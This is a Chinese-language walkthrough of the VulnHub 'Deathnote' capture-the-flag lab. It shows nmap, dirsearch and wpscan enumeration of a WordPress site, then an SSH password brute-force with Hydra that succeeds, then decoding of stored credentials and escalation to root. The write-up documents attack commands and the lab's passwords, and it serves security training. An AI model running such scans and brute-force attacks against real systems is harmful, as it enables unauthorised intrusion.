VulnHub——Deathnote
一、信息收集
1.存活主机扫描
靶机ip:192.168.197.130
┌──(root㉿kali)-[~]
└─# nmap 192.168.197.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-24 09:39 CST
Nmap scan report for 192.168.197.1
Host is up (0.00016s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6000/tcp open X11
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.197.2
Host is up (0.000098s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:F2:C0:58 (VMware)
Nmap scan report for 192.168.197.130
Host is up (0.00032s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:83:6E:83 (VMware)
Nmap scan report for 192.168.197.254
Host is up (0.00017s latency).
All 1000 scanned ports on 192.168.197.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:FB:32:FE (VMware)
Nmap scan report for 192.168.197.128
Host is up (0.0000030s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (5 hosts up) scanned in 9.96 seconds
2.端口扫描
22、80端口
┌──(root㉿kali)-[~]
└─# nmap -A -p- 192.168.197.130
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-24 09:41 CST
Nmap scan report for 192.168.197.130
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
| 256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_ 256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:83:6E:83 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms 192.168.197.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.97 seconds
3.目录爆破
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.197.130 -x 403
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.197.130/_23-02-24_09-42-31.txt
Error Log: /root/.dirsearch/logs/errors-23-02-24_09-42-31.log
Target: http://192.168.197.130/
[09:42:31] Starting:
[09:42:54] 200 - 197B - /index.html
[09:42:57] 301 - 319B - /manual -> http://192.168.197.130/manual/
[09:42:57] 200 - 626B - /manual/index.html
[09:43:04] 200 - 68B - /robots.txt
[09:43:19] 200 - 7KB - /wordpress/wp-login.php
[09:43:19] 200 - 18KB - /wordpress/
Task Completed
二、渗透过程
1.IP与域名绑定
访问80端口
192.168.197.130,访问后发现会跳到一个域名打不开
搜索资料之后发现需要对ip与域名进行绑定
Windows在C:\Windows\System32\drivers\etc\hosts文件中修改
Linux在/etc/hosts中修改
在Windows 中会出现修改后无法保存问题,这里需要修改文件的权限
右键(hosts文件)——属性——安全——选择users用户——编辑——勾选(修改、写入)——保存
添加ip、域名
Linux在root权限下直接添加
成功访问
这里直接跳转到了wordpress
wordpress可以说是一个针对CMS的框架,即可以把 WordPress当作一个内容管理系统(CMS)来使用。WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。
2.获取后台账号、密码
还扫描的了一个登陆界面
直接可以使用wpscan来检测:查到了一个kira用户名
┌──(root㉿kali)-[~]
└─# wpscan --url http://deathnote.vuln/wordpress/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://deathnote.vuln/wordpress/ [192.168.197.130]
[+] Started: Fri Feb 24 13:50:51 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://deathnote.vuln/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://deathnote.vuln/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://deathnote.vuln/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://deathnote.vuln/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.1.1 identified (Latest, released on 2022-11-15).
| Found By: Rss Generator (Passive Detection)
| - http://deathnote.vuln/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.1.1</generator>
| - http://deathnote.vuln/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.1.1</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.7
| Style URL: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] kira
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://deathnote.vuln/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Feb 24 13:50:54 2023
[+] Requests Done: 24
[+] Cached Requests: 36
[+] Data Sent: 6.956 KB
[+] Data Received: 96.017 KB
[+] Memory used: 167.598 MB
[+] Elapsed time: 00:00:02
尝试进行密码爆破,没有成功,只能从其他地方下手了
上面还扫到了一个图片,查看源码发现,我可以去看一看主页的提示里有什么
查到发现可以去找这个文件或看一下L的评论,下面评论有一串很怪的字符,可以尝试登陆一下
成功登录:
3.ssh连接
发现了这个文件
使用hydra<暴力破解工具>进行密码爆破ssh
┌──(root㉿kali)-[~]
└─# hydra -l l -P notes.txt 192.168.197.130 ssh
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-24 14:09:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 43 login tries (l:1/p:43), ~3 tries per task
[DATA] attacking ssh://192.168.197.130:22/
[22][ssh] host: 192.168.197.130 login: l password: death4me
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-24 14:09:47
获取到 l 用户
密码:death4me
进行ssh连接
可以看到有两个用户:
三、提权
看到一个user.txt
emmmmm这个需要解码,
搞了半天没用。。。。。。。。。
后续在/opt下发现了一些东西
linux中/opt目录用来安装附加软件包,是用户级的程序目录,可以理解为D:/Software。安装到/opt目录下的程序,它所有的数据、库文件等等都是放在同个目录下面。
讲十六进制数转换为字符串,是一串Base16编码
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
解码
cGFzc3dkIDoga2lyYWlzZXZpbCA=
获取到密码
passwd : kiraisevil
kira
进行ssh连接
查看可执行权限
发现这个用户都可执行,直接获取root权限